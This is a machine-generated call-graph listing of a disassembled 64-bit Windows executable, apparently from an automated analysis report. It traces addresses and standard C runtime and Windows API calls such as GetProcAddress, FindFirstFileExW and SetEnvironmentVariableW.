17450 7ff614c72770 59 API calls 17445->17450 17448 7ff614c74a2a 17446->17448 17452 7ff614c72770 59 API calls 17446->17452 17451 7ff614c771e0 58 API calls 17447->17451 17520 7ff614c73c60 17448->17520 17449 7ff614c7adb0 _wfindfirst32i64 8 API calls 17454 7ff614c730de 17449->17454 17450->17447 17455 7ff614c74a86 17451->17455 17452->17448 17454->15342 17463 7ff614c74d00 17454->17463 17457 7ff614c74aad 17455->17457 17458 7ff614c74a8b 17455->17458 17526 7ff614c73e10 GetProcAddress 17457->17526 17459 7ff614c72620 57 API calls 17458->17459 17459->17462 17461 7ff614c771e0 58 API calls 17461->17442 17462->17449 17464 7ff614c769b0 61 API calls 17463->17464 17467 7ff614c74d15 17464->17467 17465 7ff614c74d30 17466 7ff614c77a60 57 API calls 17465->17466 17469 7ff614c74d74 17466->17469 17467->17465 17468 7ff614c72890 59 API calls 17467->17468 17468->17465 17470 7ff614c74d79 17469->17470 17471 7ff614c74d90 17469->17471 17472 7ff614c72770 59 API calls 17470->17472 17474 7ff614c77a60 57 API calls 17471->17474 17473 7ff614c74d85 17472->17473 17473->15344 17475 7ff614c74dc5 17474->17475 17477 7ff614c71b30 49 API calls 17475->17477 17489 7ff614c74dca __std_exception_destroy 17475->17489 17476 7ff614c72770 59 API calls 17478 7ff614c74f71 17476->17478 17479 7ff614c74e47 17477->17479 17478->15344 17480 7ff614c74e73 17479->17480 17489->17476 17490 7ff614c74f5a 17489->17490 17490->15344 17521 7ff614c73c6a 17520->17521 17522 7ff614c77a60 57 API calls 17521->17522 17523 7ff614c73c92 17522->17523 17524 7ff614c7adb0 _wfindfirst32i64 8 API calls 17523->17524 17525 7ff614c73cba 17524->17525 17525->17442 17525->17461 17527 7ff614c73e5b GetProcAddress 17526->17527 17528 7ff614c73e38 17526->17528 17527->17528 17529 7ff614c73e80 GetProcAddress 17527->17529 17530 7ff614c72620 57 API calls 17528->17530 17529->17528 17531 7ff614c73ea5 GetProcAddress 17529->17531 17532 7ff614c73e4b 17530->17532 17531->17528 17533 7ff614c73ecd GetProcAddress 17531->17533 17532->17462 17533->17528 17534 7ff614c73ef5 GetProcAddress 17533->17534 17534->17528 17535 7ff614c73f1d GetProcAddress 17534->17535 17536 7ff614c73f39 17535->17536 17537 7ff614c73f45 GetProcAddress 17535->17537 17536->17537 17538 7ff614c73f6d GetProcAddress 17537->17538 17539 7ff614c73f61 17537->17539 17539->17538 17765 7ff614c8a650 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17764->17765 17766 7ff614c89111 17765->17766 17767 7ff614c8923c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17766->17767 17768 7ff614c89131 17767->17768 18100 7ff614c8a4d0 18101 7ff614c8a4ea 18100->18101 18102 7ff614c8a4d5 18100->18102 18106 7ff614c8a4f0 18102->18106 18107 7ff614c8a53a 18106->18107 18108 7ff614c8a532 18106->18108 18110 7ff614c89e48 __free_lconv_mon 11 API calls 18107->18110 18109 7ff614c89e48 __free_lconv_mon 11 API calls 18108->18109 18109->18107 18111 7ff614c8a547 18110->18111 18112 7ff614c89e48 __free_lconv_mon 11 API calls 18111->18112 18113 7ff614c8a554 18112->18113 18114 7ff614c89e48 __free_lconv_mon 11 API calls 18113->18114 18115 7ff614c8a561 18114->18115 18116 7ff614c89e48 __free_lconv_mon 11 API calls 18115->18116 18117 7ff614c8a56e 18116->18117 18118 7ff614c89e48 __free_lconv_mon 11 API calls 18117->18118 18119 7ff614c8a57b 18118->18119 18120 7ff614c89e48 __free_lconv_mon 11 API calls 18119->18120 18121 7ff614c8a588 18120->18121 18122 7ff614c89e48 __free_lconv_mon 11 API calls 18121->18122 18123 7ff614c8a595 18122->18123 18124 7ff614c89e48 __free_lconv_mon 11 API calls 18123->18124 18125 7ff614c8a5a5 18124->18125 18126 7ff614c89e48 __free_lconv_mon 11 API calls 18125->18126 18127 7ff614c8a5b5 18126->18127 18132 7ff614c8a394 18127->18132 18146 7ff614c8f7b8 EnterCriticalSection 18132->18146 18148 7ff614c905d0 18166 7ff614c8f7b8 EnterCriticalSection 18148->18166 18168 7ff614c96fd0 18171 7ff614c91760 18168->18171 18172 7ff614c917b2 18171->18172 18173 7ff614c9176d 18171->18173 18177 7ff614c8a724 18173->18177 18178 7ff614c8a750 FlsSetValue 18177->18178 18179 7ff614c8a735 FlsGetValue 18177->18179 18181 7ff614c8a75d 18178->18181 18194 7ff614c8a742 18178->18194 18180 7ff614c8a74a 18179->18180 18179->18194 18180->18178 18184 7ff614c8dd70 _set_fmode 11 API calls 18181->18184 18182 7ff614c8a748 18197 7ff614c91434 18182->18197 18183 7ff614c8923c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18185 7ff614c8a7c5 18183->18185 18186 7ff614c8a76c 18184->18186 18187 7ff614c8a78a FlsSetValue 18186->18187 18188 7ff614c8a77a FlsSetValue 18186->18188 18189 7ff614c8a796 FlsSetValue 18187->18189 18190 7ff614c8a7a8 18187->18190 18191 7ff614c8a783 18188->18191 18189->18191 18193 7ff614c8a3f4 _set_fmode 11 API calls 18190->18193 18192 7ff614c89e48 __free_lconv_mon 11 API calls 18191->18192 18192->18194 18195 7ff614c8a7b0 18193->18195 18194->18182 18194->18183 18196 7ff614c89e48 __free_lconv_mon 11 API calls 18195->18196 18196->18182 18220 7ff614c916a4 18197->18220 18199 7ff614c91469 18235 7ff614c91134 18199->18235 18202 7ff614c8cafc _fread_nolock 12 API calls 18203 7ff614c91497 18202->18203 18204 7ff614c9149f 18203->18204 18207 7ff614c914ae 18203->18207 18205 7ff614c89e48 __free_lconv_mon 11 API calls 18204->18205 18206 7ff614c91486 18205->18206 18206->18172 18242 7ff614c917dc 18207->18242 18210 7ff614c915aa 18211 7ff614c84474 _set_fmode 11 API calls 18210->18211 18213 7ff614c915af 18211->18213 18212 7ff614c91605 18215 7ff614c9166c 18212->18215 18253 7ff614c90f64 18212->18253 18216 7ff614c89e48 __free_lconv_mon 11 API calls 18213->18216 18214 7ff614c915c4 18214->18212 18217 7ff614c89e48 __free_lconv_mon 11 API calls 18214->18217 18219 7ff614c89e48 __free_lconv_mon 11 API calls 18215->18219 18216->18206 18217->18212 18219->18206 18221 7ff614c916c7 18220->18221 18224 7ff614c916d1 18221->18224 18268 7ff614c8f7b8 EnterCriticalSection 18221->18268 18223 7ff614c91743 18223->18199 18224->18223 18227 7ff614c8923c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18224->18227 18228 7ff614c9175b 18227->18228 18230 7ff614c917b2 18228->18230 18232 7ff614c8a724 50 API calls 18228->18232 18230->18199 18233 7ff614c9179c 18232->18233 18234 7ff614c91434 65 API calls 18233->18234 18234->18230 18236 7ff614c84a4c 45 API calls 18235->18236 18237 7ff614c91148 18236->18237 18238 7ff614c91154 GetOEMCP 18237->18238 18239 7ff614c91166 18237->18239 18240 7ff614c9117b 18238->18240 18239->18240 18241 7ff614c9116b GetACP 18239->18241 18240->18202 18240->18206 18241->18240 18243 7ff614c91134 47 API calls 18242->18243 18244 7ff614c91809 18243->18244 18245 7ff614c9195f 18244->18245 18246 7ff614c91846 IsValidCodePage 18244->18246 18251 7ff614c91860 __scrt_get_show_window_mode 18244->18251 18247 7ff614c7adb0 _wfindfirst32i64 8 API calls 18245->18247 18246->18245 18248 7ff614c91857 18246->18248 18249 7ff614c915a1 18247->18249 18250 7ff614c91886 GetCPInfo 18248->18250 18248->18251 18249->18210 18249->18214 18250->18245 18250->18251 18269 7ff614c9124c 18251->18269 18340 7ff614c8f7b8 EnterCriticalSection 18253->18340 18270 7ff614c91289 GetCPInfo 18269->18270 18271 7ff614c9137f 18269->18271 18270->18271 18272 7ff614c9129c 18270->18272 18273 7ff614c7adb0 _wfindfirst32i64 8 API calls 18271->18273 18280 7ff614c91f90 18272->18280 18275 7ff614c9141e 18273->18275 18275->18245 18279 7ff614c96f34 54 API calls 18279->18271 18281 7ff614c84a4c 45 API calls 18280->18281 18282 7ff614c91fd2 18281->18282 18283 7ff614c8e820 _fread_nolock MultiByteToWideChar 18282->18283 18285 7ff614c92008 18283->18285 18284 7ff614c9200f 18287 7ff614c7adb0 _wfindfirst32i64 8 API calls 18284->18287 18285->18284 18286 7ff614c8cafc _fread_nolock 12 API calls 18285->18286 18288 7ff614c920cc 18285->18288 18291 7ff614c92038 __scrt_get_show_window_mode 18285->18291 18286->18291 18289 7ff614c91313 18287->18289 18288->18284 18290 7ff614c89e48 __free_lconv_mon 11 API calls 18288->18290 18295 7ff614c96f34 18289->18295 18290->18284 18291->18288 18292 7ff614c8e820 _fread_nolock MultiByteToWideChar 18291->18292 18293 7ff614c920ae 18292->18293 18293->18288 18294 7ff614c920b2 GetStringTypeW 18293->18294 18294->18288 18296 7ff614c84a4c 45 API calls 18295->18296 18297 7ff614c96f59 18296->18297 18300 7ff614c96c00 18297->18300 18301 7ff614c96c41 18300->18301 18302 7ff614c8e820 _fread_nolock MultiByteToWideChar 18301->18302 18303 7ff614c96c8b 18302->18303 18304 7ff614c96f09 18303->18304 18307 7ff614c8cafc _fread_nolock 12 API calls 18303->18307 18308 7ff614c96dc1 18303->18308 18310 7ff614c96cc3 18303->18310 18305 7ff614c7adb0 _wfindfirst32i64 8 API calls 18304->18305 18306 7ff614c91346 18305->18306 18306->18279 18307->18310 18308->18304 18309 7ff614c89e48 __free_lconv_mon 11 API calls 18308->18309 18309->18304 18310->18308 18311 7ff614c8e820 _fread_nolock MultiByteToWideChar 18310->18311 18312 7ff614c96d36 18311->18312 18312->18308 18331 7ff614c8e1bc 18312->18331 18315 7ff614c96d81 18315->18308 18318 7ff614c8e1bc __crtLCMapStringW 6 API calls 18315->18318 18316 7ff614c96dd2 18317 7ff614c8cafc _fread_nolock 12 API calls 18316->18317 18319 7ff614c96ea4 18316->18319 18321 7ff614c96df0 18316->18321 18317->18321 18318->18308 18319->18308 18320 7ff614c89e48 __free_lconv_mon 11 API calls 18319->18320 18320->18308 18321->18308 18322 7ff614c8e1bc __crtLCMapStringW 6 API calls 18321->18322 18323 7ff614c96e70 18322->18323 18323->18319 18324 7ff614c96e90 18323->18324 18325 7ff614c96ea6 18323->18325 18326 7ff614c8f0e8 WideCharToMultiByte 18324->18326 18327 7ff614c8f0e8 WideCharToMultiByte 18325->18327 18328 7ff614c96e9e 18326->18328 18327->18328 18328->18319 18329 7ff614c96ebe 18328->18329 18329->18308 18330 7ff614c89e48 __free_lconv_mon 11 API calls 18329->18330 18330->18308 18332 7ff614c8dde8 __crtLCMapStringW 5 API calls 18331->18332 18333 7ff614c8e1fa 18332->18333 18334 7ff614c8e202 18333->18334 18337 7ff614c8e2a8 18333->18337 18334->18308 18334->18315 18334->18316 18336 7ff614c8e26b LCMapStringW 18336->18334 18338 7ff614c8dde8 __crtLCMapStringW 5 API calls 18337->18338 18339 7ff614c8e2d6 __crtLCMapStringW 18338->18339 18339->18336 17938 7ff614c7a650 17939 7ff614c7a673 17938->17939 17940 7ff614c7a68f memcpy_s 17938->17940 17941 7ff614c8cafc 12 API calls 17939->17941 17941->17940 17828 7ff614c86744 17829 7ff614c867ab 17828->17829 17830 7ff614c86772 17828->17830 17829->17830 17831 7ff614c867b0 FindFirstFileExW 17829->17831 17832 7ff614c84474 _set_fmode 11 API calls 17830->17832 17833 7ff614c86819 17831->17833 17834 7ff614c867d2 GetLastError 17831->17834 17835 7ff614c86777 17832->17835 17888 7ff614c869b4 17833->17888 17837 7ff614c86809 17834->17837 17842 7ff614c867dd 17834->17842 17838 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 17835->17838 17840 7ff614c84474 _set_fmode 11 API calls 17837->17840 17839 7ff614c86782 17838->17839 17846 7ff614c7adb0 _wfindfirst32i64 8 API calls 17839->17846 17840->17839 17842->17837 17844 7ff614c867f9 17842->17844 17845 7ff614c867e7 17842->17845 17843 7ff614c869b4 _wfindfirst32i64 10 API calls 17847 7ff614c8683f 17843->17847 17849 7ff614c84474 _set_fmode 11 API calls 17844->17849 17845->17837 17848 7ff614c867ec 17845->17848 17850 7ff614c86796 17846->17850 17851 7ff614c869b4 _wfindfirst32i64 10 API calls 17847->17851 17852 7ff614c84474 _set_fmode 11 API calls 17848->17852 17849->17839 17853 7ff614c8684d 17851->17853 17852->17839 17854 7ff614c8f954 _wfindfirst32i64 37 API calls 17853->17854 17855 7ff614c8686b 17854->17855 17855->17839 17856 7ff614c86877 17855->17856 17857 7ff614c89e00 _wfindfirst32i64 17 API calls 17856->17857 17858 7ff614c8688b 17857->17858 17859 7ff614c868b5 17858->17859 17862 7ff614c868f4 FindNextFileW 17858->17862 17860 7ff614c84474 _set_fmode 11 API calls 17859->17860 17861 7ff614c868ba 17860->17861 17863 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 17861->17863 17864 7ff614c86944 17862->17864 17865 7ff614c86903 GetLastError 17862->17865 17866 7ff614c868c5 17863->17866 17867 7ff614c869b4 _wfindfirst32i64 10 API calls 17864->17867 17868 7ff614c86937 17865->17868 17869 7ff614c8690e 17865->17869 17872 7ff614c7adb0 _wfindfirst32i64 8 API calls 17866->17872 17871 7ff614c8695c 17867->17871 17870 7ff614c84474 _set_fmode 11 API calls 17868->17870 17869->17868 17874 7ff614c8692a 17869->17874 17875 7ff614c86918 17869->17875 17870->17866 17873 7ff614c869b4 _wfindfirst32i64 10 API calls 17871->17873 17877 7ff614c868d8 17872->17877 17878 7ff614c8696a 17873->17878 17876 7ff614c84474 _set_fmode 11 API calls 17874->17876 17875->17868 17879 7ff614c8691d 17875->17879 17876->17866 17881 7ff614c869b4 _wfindfirst32i64 10 API calls 17878->17881 17880 7ff614c84474 _set_fmode 11 API calls 17879->17880 17880->17866 17882 7ff614c86978 17881->17882 17883 7ff614c8f954 _wfindfirst32i64 37 API calls 17882->17883 17884 7ff614c86996 17883->17884 17884->17866 17885 7ff614c8699e 17884->17885 17886 7ff614c89e00 _wfindfirst32i64 17 API calls 17885->17886 17887 7ff614c869b2 17886->17887 17889 7ff614c869cc 17888->17889 17890 7ff614c869d2 FileTimeToSystemTime 17888->17890 17889->17890 17892 7ff614c869f7 17889->17892 17891 7ff614c869e1 SystemTimeToTzSpecificLocalTime 17890->17891 17890->17892 17891->17892 17893 7ff614c7adb0 _wfindfirst32i64 8 API calls 17892->17893 17894 7ff614c86831 17893->17894 17894->17843 18863 7ff614c8fa38 18864 7ff614c8fa5c 18863->18864 18867 7ff614c8fa6c 18863->18867 18865 7ff614c84474 _set_fmode 11 API calls 18864->18865 18866 7ff614c8fa61 18865->18866 18868 7ff614c8fd4c 18867->18868 18869 7ff614c8fa8e 18867->18869 18870 7ff614c84474 _set_fmode 11 API calls 18868->18870 18871 7ff614c8faaf 18869->18871 18994 7ff614c900f4 18869->18994 18872 7ff614c8fd51 18870->18872 18875 7ff614c8fb21 18871->18875 18877 7ff614c8fad5 18871->18877 18885 7ff614c8fb15 18871->18885 18873 7ff614c89e48 __free_lconv_mon 11 API calls 18872->18873 18873->18866 18879 7ff614c8dd70 _set_fmode 11 API calls 18875->18879 18892 7ff614c8fae4 18875->18892 18876 7ff614c8fbce 18883 7ff614c8fc3d 18876->18883 18889 7ff614c8fbeb 18876->18889 19009 7ff614c88548 18877->19009 18881 7ff614c8fb37 18879->18881 18886 7ff614c89e48 __free_lconv_mon 11 API calls 18881->18886 18883->18892 18896 7ff614c9252c 40 API calls 18883->18896 18884 7ff614c89e48 __free_lconv_mon 11 API calls 18884->18866 18885->18876 18885->18892 19015 7ff614c964dc 18885->19015 18895 7ff614c8fb45 18886->18895 18887 7ff614c8fadf 18890 7ff614c84474 _set_fmode 11 API calls 18887->18890 18888 7ff614c8fafd 18888->18885 18894 7ff614c900f4 45 API calls 18888->18894 18891 7ff614c89e48 __free_lconv_mon 11 API calls 18889->18891 18890->18892 18893 7ff614c8fbf4 18891->18893 18892->18884 18904 7ff614c8fbf9 18893->18904 19051 7ff614c9252c 18893->19051 18894->18885 18895->18885 18895->18892 18897 7ff614c8dd70 _set_fmode 11 API calls 18895->18897 18898 7ff614c8fc7a 18896->18898 18900 7ff614c8fb67 18897->18900 18901 7ff614c89e48 __free_lconv_mon 11 API calls 18898->18901 18905 7ff614c89e48 __free_lconv_mon 11 API calls 18900->18905 18906 7ff614c8fc84 18901->18906 18902 7ff614c8fc25 18907 7ff614c89e48 __free_lconv_mon 11 API calls 18902->18907 18903 7ff614c8fd40 18908 7ff614c89e48 __free_lconv_mon 11 API calls 18903->18908 18904->18903 18909 7ff614c8dd70 _set_fmode 11 API calls 18904->18909 18905->18885 18906->18892 18906->18904 18907->18904 18908->18866 18910 7ff614c8fcc8 18909->18910 18911 7ff614c8fcd0 18910->18911 18912 7ff614c8fcd9 18910->18912 18913 7ff614c89e48 __free_lconv_mon 11 API calls 18911->18913 18914 7ff614c891dc __std_exception_copy 37 API calls 18912->18914 18915 7ff614c8fcd7 18913->18915 18916 7ff614c8fce8 18914->18916 18920 7ff614c89e48 __free_lconv_mon 11 API calls 18915->18920 18917 7ff614c8fcf0 18916->18917 18918 7ff614c8fd7b 18916->18918 19060 7ff614c965f4 18917->19060 18919 7ff614c89e00 _wfindfirst32i64 17 API calls 18918->18919 18922 7ff614c8fd8f 18919->18922 18920->18866 18926 7ff614c8fdb8 18922->18926 18932 7ff614c8fdc8 18922->18932 18924 7ff614c8fd17 18927 7ff614c84474 _set_fmode 11 API calls 18924->18927 18925 7ff614c8fd38 18929 7ff614c89e48 __free_lconv_mon 11 API calls 18925->18929 18928 7ff614c84474 _set_fmode 11 API calls 18926->18928 18930 7ff614c8fd1c 18927->18930 18956 7ff614c8fdbd 18928->18956 18929->18903 18931 7ff614c89e48 __free_lconv_mon 11 API calls 18930->18931 18931->18915 18933 7ff614c900ab 18932->18933 18934 7ff614c8fdea 18932->18934 18935 7ff614c84474 _set_fmode 11 API calls 18933->18935 18936 7ff614c8fe07 18934->18936 19079 7ff614c901dc 18934->19079 18937 7ff614c900b0 18935->18937 18940 7ff614c8fe7b 18936->18940 18942 7ff614c8fe2f 18936->18942 18946 7ff614c8fe6f 18936->18946 18938 7ff614c89e48 __free_lconv_mon 11 API calls 18937->18938 18938->18956 18944 7ff614c8fea3 18940->18944 18947 7ff614c8dd70 _set_fmode 11 API calls 18940->18947 18962 7ff614c8fe3e 18940->18962 18941 7ff614c8ff2e 18955 7ff614c8ff4b 18941->18955 18963 7ff614c8ff9e 18941->18963 19094 7ff614c88584 18942->19094 18944->18946 18949 7ff614c8dd70 _set_fmode 11 API calls 18944->18949 18944->18962 18946->18941 18946->18962 19100 7ff614c9639c 18946->19100 18951 7ff614c8fe95 18947->18951 18954 7ff614c8fec5 18949->18954 18950 7ff614c89e48 __free_lconv_mon 11 API calls 18950->18956 18957 7ff614c89e48 __free_lconv_mon 11 API calls 18951->18957 18952 7ff614c8fe57 18952->18946 18961 7ff614c901dc 45 API calls 18952->18961 18953 7ff614c8fe39 18958 7ff614c84474 _set_fmode 11 API calls 18953->18958 18959 7ff614c89e48 __free_lconv_mon 11 API calls 18954->18959 18960 7ff614c89e48 __free_lconv_mon 11 API calls 18955->18960 18957->18944 18958->18962 18959->18946 18964 7ff614c8ff54 18960->18964 18961->18946 18962->18950 18963->18962 18965 7ff614c9252c 40 API calls 18963->18965 18967 7ff614c9252c 40 API calls 18964->18967 18971 7ff614c8ff5a 18964->18971 18966 7ff614c8ffdc 18965->18966 18968 7ff614c89e48 __free_lconv_mon 11 API calls 18966->18968 18972 7ff614c8ff86 18967->18972 18969 7ff614c8ffe6 18968->18969 18969->18962 18969->18971 18970 7ff614c9009f 18974 7ff614c89e48 __free_lconv_mon 11 API calls 18970->18974 18971->18970 18975 7ff614c8dd70 _set_fmode 11 API calls 18971->18975 18973 7ff614c89e48 __free_lconv_mon 11 API calls 18972->18973 18973->18971 18974->18956 18976 7ff614c9002b 18975->18976 18977 7ff614c90033 18976->18977 18978 7ff614c9003c 18976->18978 18979 7ff614c89e48 __free_lconv_mon 11 API calls 18977->18979 18980 7ff614c8f954 _wfindfirst32i64 37 API calls 18978->18980 18981 7ff614c9003a 18979->18981 18982 7ff614c9004a 18980->18982 18988 7ff614c89e48 __free_lconv_mon 11 API calls 18981->18988 18983 7ff614c900df 18982->18983 18984 7ff614c90052 SetEnvironmentVariableW 18982->18984 18987 7ff614c89e00 _wfindfirst32i64 17 API calls 18983->18987 18985 7ff614c90076 18984->18985 18986 7ff614c90097 18984->18986 18989 7ff614c84474 _set_fmode 11 API calls 18985->18989 18991 7ff614c89e48 __free_lconv_mon 11 API calls 18986->18991 18990 7ff614c900f3 18987->18990 18988->18956 18992 7ff614c9007b 18989->18992 18991->18970 18993 7ff614c89e48 __free_lconv_mon 11 API calls 18992->18993 18993->18981 18995 7ff614c90111 18994->18995 18996 7ff614c90129 18994->18996 18995->18871 18997 7ff614c8dd70 _set_fmode 11 API calls 18996->18997 18998 7ff614c9014d 18997->18998 18999 7ff614c901ae 18998->18999 19003 7ff614c8dd70 _set_fmode 11 API calls 18998->19003 19004 7ff614c89e48 __free_lconv_mon 11 API calls 18998->19004 19005 7ff614c891dc __std_exception_copy 37 API calls 18998->19005 19006 7ff614c901bd 18998->19006 19008 7ff614c901d2 18998->19008 19002 7ff614c89e48 __free_lconv_mon 11 API calls 18999->19002 19000 7ff614c8923c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19001 7ff614c901d8 19000->19001 19002->18995 19003->18998 19004->18998 19005->18998 19007 7ff614c89e00 _wfindfirst32i64 17 API calls 19006->19007 19007->19008 19008->19000 19010 7ff614c88558 19009->19010 19013 7ff614c88561 19009->19013 19010->19013 19124 7ff614c88020 19010->19124 19013->18887 19013->18888 19016 7ff614c964e9 19015->19016 19017 7ff614c9568c 19015->19017 19019 7ff614c84a4c 45 API calls 19016->19019 19018 7ff614c95699 19017->19018 19023 7ff614c956cf 19017->19023 19021 7ff614c84474 _set_fmode 11 API calls 19018->19021 19030 7ff614c95640 19018->19030 19020 7ff614c9651d 19019->19020 19026 7ff614c96533 19020->19026 19029 7ff614c96522 19020->19029 19032 7ff614c9654a 19020->19032 19024 7ff614c956a3 19021->19024 19022 7ff614c956f9 19025 7ff614c84474 _set_fmode 11 API calls 19022->19025 19023->19022 19031 7ff614c9571e 19023->19031 19027 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19024->19027 19028 7ff614c956fe 19025->19028 19033 7ff614c84474 _set_fmode 11 API calls 19026->19033 19034 7ff614c956ae 19027->19034 19035 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19028->19035 19029->18885 19030->18885 19038 7ff614c84a4c 45 API calls 19031->19038 19043 7ff614c95709 19031->19043 19036 7ff614c96554 19032->19036 19037 7ff614c96566 19032->19037 19039 7ff614c96538 19033->19039 19034->18885 19035->19043 19040 7ff614c84474 _set_fmode 11 API calls 19036->19040 19041 7ff614c9658e 19037->19041 19042 7ff614c96577 19037->19042 19038->19043 19044 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19039->19044 19045 7ff614c96559 19040->19045 19195 7ff614c983b8 19041->19195 19186 7ff614c956dc 19042->19186 19043->18885 19044->19029 19048 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19045->19048 19048->19029 19050 7ff614c84474 _set_fmode 11 API calls 19050->19029 19052 7ff614c9254e 19051->19052 19054 7ff614c9256b 19051->19054 19053 7ff614c9255c 19052->19053 19052->19054 19056 7ff614c84474 _set_fmode 11 API calls 19053->19056 19055 7ff614c92575 19054->19055 19235 7ff614c96fe8 19054->19235 19242 7ff614c8f9bc 19055->19242 19059 7ff614c92561 __scrt_get_show_window_mode 19056->19059 19059->18902 19061 7ff614c84a4c 45 API calls 19060->19061 19062 7ff614c9665a 19061->19062 19063 7ff614c96668 19062->19063 19064 7ff614c8dffc 5 API calls 19062->19064 19065 7ff614c84534 14 API calls 19063->19065 19064->19063 19066 7ff614c966c4 19065->19066 19067 7ff614c96754 19066->19067 19068 7ff614c84a4c 45 API calls 19066->19068 19069 7ff614c96765 19067->19069 19071 7ff614c89e48 __free_lconv_mon 11 API calls 19067->19071 19070 7ff614c966d7 19068->19070 19072 7ff614c8fd13 19069->19072 19074 7ff614c89e48 __free_lconv_mon 11 API calls 19069->19074 19073 7ff614c8dffc 5 API calls 19070->19073 19075 7ff614c966e0 19070->19075 19071->19069 19072->18924 19072->18925 19073->19075 19074->19072 19076 7ff614c84534 14 API calls 19075->19076 19077 7ff614c9673b 19076->19077 19077->19067 19078 7ff614c96743 SetEnvironmentVariableW 19077->19078 19078->19067 19080 7ff614c901ff 19079->19080 19081 7ff614c9021c 19079->19081 19080->18936 19082 7ff614c8dd70 _set_fmode 11 API calls 19081->19082 19089 7ff614c90240 19082->19089 19083 7ff614c902c4 19085 7ff614c8923c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19083->19085 19084 7ff614c902a1 19086 7ff614c89e48 __free_lconv_mon 11 API calls 19084->19086 19087 7ff614c902ca 19085->19087 19086->19080 19088 7ff614c8dd70 _set_fmode 11 API calls 19088->19089 19089->19083 19089->19084 19089->19088 19090 7ff614c89e48 __free_lconv_mon 11 API calls 19089->19090 19091 7ff614c8f954 _wfindfirst32i64 37 API calls 19089->19091 19092 7ff614c902b0 19089->19092 19090->19089 19091->19089 19093 7ff614c89e00 _wfindfirst32i64 17 API calls 19092->19093 19093->19083 19095 7ff614c88594 19094->19095 19096 7ff614c8859d 19094->19096 19095->19096 19097 7ff614c88094 40 API calls 19095->19097 19096->18952 19096->18953 19098 7ff614c885a6 19097->19098 19098->19096 19099 7ff614c88454 12 API calls 19098->19099 19099->19096 19101 7ff614c963a9 19100->19101 19104 7ff614c963d6 19100->19104 19102 7ff614c963ae 19101->19102 19101->19104 19103 7ff614c84474 _set_fmode 11 API calls 19102->19103 19106 7ff614c963b3 19103->19106 19105 7ff614c9641a 19104->19105 19108 7ff614c96439 19104->19108 19120 7ff614c9640e __crtLCMapStringW 19104->19120 19107 7ff614c84474 _set_fmode 11 API calls 19105->19107 19109 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19106->19109 19110 7ff614c9641f 19107->19110 19111 7ff614c96443 19108->19111 19112 7ff614c96455 19108->19112 19113 7ff614c963be 19109->19113 19115 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19110->19115 19116 7ff614c84474 _set_fmode 11 API calls 19111->19116 19114 7ff614c84a4c 45 API calls 19112->19114 19113->18946 19117 7ff614c96462 19114->19117 19115->19120 19118 7ff614c96448 19116->19118 19117->19120 19254 7ff614c97f74 19117->19254 19119 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19118->19119 19119->19120 19120->18946 19123 7ff614c84474 _set_fmode 11 API calls 19123->19120 19125 7ff614c88039 19124->19125 19134 7ff614c88035 19124->19134 19126 7ff614c91760 65 API calls 19125->19126 19127 7ff614c8803e 19126->19127 19147 7ff614c91a9c GetEnvironmentStringsW 19127->19147 19130 7ff614c8804b 19132 7ff614c89e48 __free_lconv_mon 11 API calls 19130->19132 19131 7ff614c88057 19167 7ff614c88104 19131->19167 19132->19134 19134->19013 19139 7ff614c88374 19134->19139 19136 7ff614c89e48 __free_lconv_mon 11 API calls 19137 7ff614c8807e 19136->19137 19138 7ff614c89e48 __free_lconv_mon 11 API calls 19137->19138 19138->19134 19140 7ff614c8839d 19139->19140 19145 7ff614c883b6 19139->19145 19140->19013 19141 7ff614c8f0e8 WideCharToMultiByte 19141->19145 19142 7ff614c8dd70 _set_fmode 11 API calls 19142->19145 19143 7ff614c88446 19144 7ff614c89e48 __free_lconv_mon 11 API calls 19143->19144 19144->19140 19145->19140 19145->19141 19145->19142 19145->19143 19146 7ff614c89e48 __free_lconv_mon 11 API calls 19145->19146 19146->19145 19148 7ff614c88043 19147->19148 19149 7ff614c91acc 19147->19149 19148->19130 19148->19131 19150 7ff614c8f0e8 WideCharToMultiByte 19149->19150 19151 7ff614c91b1d 19150->19151 19152 7ff614c91b24 FreeEnvironmentStringsW 19151->19152 19153 7ff614c8cafc _fread_nolock 12 API calls 19151->19153 19152->19148 19154 7ff614c91b37 19153->19154 19155 7ff614c91b3f 19154->19155 19156 7ff614c91b48 19154->19156 19157 7ff614c89e48 __free_lconv_mon 11 API calls 19155->19157 19158 7ff614c8f0e8 WideCharToMultiByte 19156->19158 19159 7ff614c91b46 19157->19159 19160 7ff614c91b6b 19158->19160 19159->19152 19161 7ff614c91b6f 19160->19161 19162 7ff614c91b79 19160->19162 19164 7ff614c89e48 __free_lconv_mon 11 API calls 19161->19164 19163 7ff614c89e48 __free_lconv_mon 11 API calls 19162->19163 19165 7ff614c91b77 FreeEnvironmentStringsW 19163->19165 19164->19165 19165->19148 19168 7ff614c88129 19167->19168 19169 7ff614c8dd70 _set_fmode 11 API calls 19168->19169 19181 7ff614c8815f 19169->19181 19170 7ff614c88167 19171 7ff614c89e48 __free_lconv_mon 11 API calls 19170->19171 19172 7ff614c8805f 19171->19172 19172->19136 19173 7ff614c881da 19174 7ff614c89e48 __free_lconv_mon 11 API calls 19173->19174 19174->19172 19175 7ff614c8dd70 _set_fmode 11 API calls 19175->19181 19176 7ff614c881c9 19178 7ff614c88330 11 API calls 19176->19178 19177 7ff614c891dc __std_exception_copy 37 API calls 19177->19181 19179 7ff614c881d1 19178->19179 19182 7ff614c89e48 __free_lconv_mon 11 API calls 19179->19182 19180 7ff614c881ff 19184 7ff614c89e00 _wfindfirst32i64 17 API calls 19180->19184 19181->19170 19181->19173 19181->19175 19181->19176 19181->19177 19181->19180 19183 7ff614c89e48 __free_lconv_mon 11 API calls 19181->19183 19182->19170 19183->19181 19185 7ff614c88212 19184->19185 19187 7ff614c95710 19186->19187 19188 7ff614c956f9 19186->19188 19187->19188 19190 7ff614c9571e 19187->19190 19189 7ff614c84474 _set_fmode 